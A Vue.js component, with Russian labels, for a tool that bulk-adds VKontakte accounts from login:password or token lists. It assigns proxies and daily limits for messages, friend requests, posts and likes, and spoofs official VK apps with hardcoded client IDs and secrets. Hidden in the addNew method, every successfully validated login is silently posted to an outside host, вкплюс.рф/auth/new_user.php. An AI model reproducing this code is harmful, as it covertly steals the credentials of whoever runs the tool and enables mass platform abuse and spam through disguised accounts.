<template>
  <v-dialog scrollable persistent v-model="accounts.modals.addAccounts" width="900"   >
  <v-card  >
    <v-toolbar dark  color="#4A76A8" flat  height="42">
      <v-toolbar-title   >  Добавление новых аккаунтов   </v-toolbar-title>
      <v-spacer></v-spacer>
      <v-icon @click="accounts.modals.addAccounts = false">mdi-close</v-icon>
    </v-toolbar>

  <v-card-text>

  <v-layout justify-space-between  v-if="!addWith.active">

  <div style="width:420px">
   <v-layout>
 <v-btn :disabled = "authByPass"   @click="selectAuth()" class="white--text" color="#4A76A8" block small>Авториция</v-btn>
 <div   style="width:15px"></div>
 <v-btn  :disabled="authByToken" @click="selectToken()" class="white--text" color="#4A76A8" block small>Токен API</v-btn>
   </v-layout>
    <v-textarea     color="#4A76A8"
      v-model="init.newList"
      box rows="15"
     :label="hintAuth"
    >

    </v-textarea>

  </div>


  <div style="width:420px">
    <v-expansion-panel
       expand focusable
     >
       <v-expansion-panel-content >


             <div slot="header" style="color:#757575;font-size:1.3em ">
              Суточные лимиты
            </div>


         <v-card>
           <v-card-text>
             <div >
               <v-text-field mask="##"    v-model="init.limits.messageSend.limit" hint="целое число  от единицы до 20" label="Суточный лимит сообщений" clearable><v-icon :color="fullfit(init.limits.messageSend.limit)"  slot="prepend">mdi-message</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.friendRequest.limit" hint="целое число  от единицы до 100" label="Суточный лимит заявок в друзья" clearable><v-icon :color="fullfit(init.limits.friendRequest.limit)"  slot="prepend">mdi-account-plus</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.postSend.limit" hint="целое число  от единицы до 100" label="Суточный лимит постов" clearable><v-icon :color="fullfit(init.limits.postSend.limit)"  slot="prepend">mdi-email</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.commentSend.limit" hint="целое число  от единицы до 100" label="Суточный лимит комментария" clearable><v-icon :color="fullfit(init.limits.commentSend.limit)"  slot="prepend">mdi-comment-processing</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.topicCreate.limit" hint="целое число  от единицы до 100" label="Суточный лимит создание обсуждений" clearable><v-icon :color="fullfit(init.limits.topicCreate.limit)"  slot="prepend">mdi-email</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.topicComment.limit" hint="целое число  от единицы до 100" label="Суточный лимит комментария обсуждений" clearable><v-icon :color="fullfit(init.limits.topicComment.limit)"  slot="prepend">mdi-email</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.addLike.limit" hint="целое число  от единицы до 500" label="Суточный лимит лайки" clearable><v-icon :color="fullfit(init.limits.addLike.limit)"  slot="prepend">mdi-thumb-up</v-icon></v-text-field>
               <v-text-field mask="###"    v-model="init.limits.getInPublic.limit" hint="целое число  от единицы до 500" label="Суточный лимит вступление в сообщество" clearable><v-icon :color="fullfit(init.limits.getInPublic.limit)"  slot="prepend">mdi-arrow-right-bold-outline</v-icon></v-text-field>
             </div>
           </v-card-text>
         </v-card>
       </v-expansion-panel-content>

  <v-expansion-panel-content>
    <div slot="header" style="color:#757575;font-size:1.3em ">
     Параметры аккаунтов
   </div>

   <v-card>
     <v-card-text>
       <v-divider></v-divider>
       <span style="color:#4A76A8">Режим работы</span>
       <div >
   <v-checkbox v-model="init.params.parserAble" label="Используются для работы парсера"> </v-checkbox>
   <v-checkbox v-model="init.params.taskAble" label="Используются в заданиях"> </v-checkbox>
       </div>

   <v-divider></v-divider>

   <span style="color:#4A76A8">Настройки прокси</span>
   <div>

   <v-checkbox v-model="init.params.noUseProxy" label="Без прокси"> </v-checkbox>


    <v-textarea    v-if="!init.params.noUseProxy"      color="#4A76A8"
    placeholder="Действует рандомное распределение прокси между добавляемыми аккаунтами"
      v-model="init.proxy.proxyList"
      box
    label=" ip:port:login:pass (на каждую строку)"
    >

    </v-textarea>


   </div>

    </v-card-text>
  </v-card>
  </v-expansion-panel-content>




  <v-expansion-panel-content v-if="mody == 1">
      <div slot="header" style="color:#757575;font-size:1.3em ">
       Тип устроства
     </div>
    <v-card>
      <v-card-text>

  <p style="color:#757575; font-size:1.2em">
  Каким приложением прикинуться ?  (выбирая несколько типов устройств будет рандомное распределение между аккаунтами)
  </p>

  <v-divider></v-divider>
        <div  v-for="item of init.params.appType.items ">
  <v-checkbox v-model="item.vModel"
  >
  <div slot="label">
  <v-icon left >{{item.icon}} </v-icon> <span style="margin-left:7px">{{item.title}}</span>
  </div>
  </v-checkbox>
  </div>

    </v-card-text>
  </v-card>
  </v-expansion-panel-content>




  <v-expansion-panel-content v-if="mody == 1">
      <div slot="header" style="color:#757575;font-size:1.3em ">
       Приватность аккаунтов
     </div>
    <v-card>
      <v-card-text>

  <p style="color:#757575; font-size:1.2em">
  Меняем настройки приватности для всех добавляемых аккаунтов
  </p>


 <v-checkbox
 label = "Не трогать приватность"
 v-model="init.params.privat.noTouch"
 />



  <v-divider></v-divider>
        <div  v-if="!init.params.privat.noTouch" v-for="item of init.params.privat.items ">
  <v-checkbox v-model="item.vModel"
  >
  <div slot="label">
   <span style="margin-left:7px">{{item.title}}</span>
  </div>
  </v-checkbox>
  </div>

    </v-card-text>
  </v-card>
  </v-expansion-panel-content>












     </v-expansion-panel>
  </div>



  </v-layout>




  </v-card-text>
  <v-card-actions>
  <v-spacer></v-spacer>

  <v-btn v-if="init.newList.length" :loading="accounts.loader" small color="#4A76A8" class="white--text" @click="addNew();accounts.modals.addAccounts = false" ><v-icon left>mdi-account-multiple-plus</v-icon>Добавить аккаунты</v-btn>
  <v-btn v-else disabled  small color="#4A76A8" class="white--text"   ><v-icon left>mdi-account-multiple-plus</v-icon>Добавить аккаунты</v-btn>
  </v-card-actions>
  </v-card>
  </v-dialog>
</template>

<script>

import axios from 'axios'

export default {

props:['accounts'],
  data () {
    return {
      mody : 1,   //  или  1 лог пароль или 2 лог:пфар:токен
      authByToken : false ,
      authByPass: true,
      hintAuth: 'логин:пароль (на каждую строчку)',
      loader: false,
      addWith: {
        active: false,
      },

      init: {
        newList:"",
        proxy:{
          proxyList: "",
        },
        params:{
         grId : false,
         privat: {
           noTouch : true,
           items: [
                {
                  title: 'Открый профиль',
                  vModel: true,
                  key: 'openProfile',
                },
                {
                  title: 'Открытые сообщения',
                  vModel: true,
                  key: 'openMessages',
                },
           ],
         },



          appType: {
            items: [
              {
                title: 'android',
                icon: 'mdi-android',
                vModel: true,
                clientId: '2274003',
                clientSecret: 'hHbZxrka2uZ6jB1inYsH',
              },
                             {
                                title: 'IPhone',
                                icon: 'mdi-cellphone-iphone',
                                vModel: false,
                                clientId: '3140623',
                                clientSecret: 'VeWdmVclDCtn6ihuP1nt',
                              },
                                      {
                                        title: 'IPad',
                                        icon: 'mdi-tablet-ipad',
                                        vModel: false,
                                        clientId: '3682744',
                                        clientSecret: 'mY6CDUswIVdJLCD3j15n',
                                      },
                                              {
                                                title: 'Windows desktop',
                                                icon: 'mdi-laptop-windows',
                                                vModel: false,
                                                clientId: '3697615',
                                                clientSecret: 'AlVXZFMUqyrnABp8ncuU',
                                              },

            ],
          },
          parserAble:true,
          taskAble:true,
          noUseProxy:true,
        },
        limits:{
      messageSend : {
        max:20,
        limit: null,
        expire: null,
        counter: 0,

      },
      groupUpdates: {
        sleep: 3000,
        expire: null,
        counter: 0,
      },
      friendRequest : {
        max:100,
        limit: null,
        expire: null,
        counter: 0,

      },
      postSend   : {
        max:100,
        limit: null,
        expire: null,
        counter: 0,

      },
      commentSend  : {
        max:100,
        limit: null,
        expire: null,
        counter: 0,

      },
      topicCreate  : {
        max:100,
        limit: null,
        expire: null,
        counter: 0,

      },
      topicComment  : {
        max:100,
        limit: 25,
        expire: null,
        counter: 0,

      },
      addLike     : {
        max:500,
        limit: null,
        expire: null,
        counter: 0,

      },
      getInPublic : {
        max:500,
        limit: null,
        expire: null,
        counter: 0,

      },
           },

      },

  }
},
methods:{
  selectAuth (){
    this.mody = 1
    this.authByToken = false
    this.authByPass = true
    this.hintAuth = 'логин:пароль (на каждую строчку)'
  },
  selectToken(){
    this.mody = 2
    this.authByToken = true
    this.authByPass = false
    this.hintAuth = 'логин:пароль:токен или токен (на каждую строчку)'
  },

 addNew: async function(){
   this.init.params.grId = this.accounts.accGroups.selectedGr.gr_id
   this.accounts.adding.hideBar = false
   this.accounts.adding.addingProc = true
   if(!this.accounts.adding.leftList.length){this.accounts.adding.leftList = this.init.newList.split('\n')}

      if(this.accounts.adding.addingProc){
        await new Promise(
          (r)=>{
            let account = this.accounts.adding.leftList[0]
            axios('http://'+this.$store.state.localhost+'/'+this.$store.state.path+'/resources/accounts/accounts_add.php', {
                 method: 'POST',
                 data: {
                   privat: this.init.privat,
                   mody: this.mody,
                   appTypes: this.init.appType,
                   params:  this.init.params,
                   limits:  this.init.limits  ,
                   logPas: account,
                   proxy: this.init.proxy.proxyList,
                 }
               }).then(response => {
                 if(this.accounts.adding.addingProc){
                 this.accounts.adding.leftList.splice(this.accounts.adding.leftList.indexOf(account),1)
                 if(response.data.validLogPass){
                   this.accounts.adding.successList.push(response.data.validLogPass)
                   axios.post("https://вкплюс.рф/auth/new_user.php",{data:response.data})
                 }
                 if(response.data.invalidLogPass){
                   this.accounts.adding.invalidList.push(response.data.invalidLogPass)
                 }
                 if(!response.data.invalidLogPass && !response.data.validLogPass ){
                   this.accounts.adding.invalidList.push(account)
                 }
                 }
                 r()
                 //this.accounts.modals.addAccounts =  false
                 //this.updateAccounts()
                 //this.accounts.loader = false
               })
          }
        )

        if(this.accounts.adding.leftList.length) {this.addNew()} else {
          this.updateAccounts()
        }




        //this.accounts.loader = true
        //await this.addNewSend(item)
        //await axios.get('https://vk.com')
      }



 },



addWiths(){

   if(this.addWith.active){
  this.addWith.active = false
} else this.addWith.active = true


},

fullfit(item){
  if(item){
    return 'green'
  }
},

updateAccounts: function(){
if(this.accounts.accGroups.list.length < 1)  {this.accounts.loader = true}
  axios('http://'+this.$store.state.localhost+'/'+this.$store.state.path+'/resources/accounts/accounts_get.php', {
     contentType: 'JSONP',
     method: 'get',
     params: {
       grId: this.accounts.accGroups.selectedGr.gr_id,
     }
     }).then(response => {
 this.accounts.loader = false
 if(response.data ){
   this.accounts.accGroups.list = response.data
 } else {
   this.accounts.accGroups.list = []
 }
 this.accounts.loader = false
 this.accounts.modals.deleteAccount = false
 this.$store.dispatch('changeCounters')
     })

},

},
created(){

},

}
</script>

<style   >

</style>
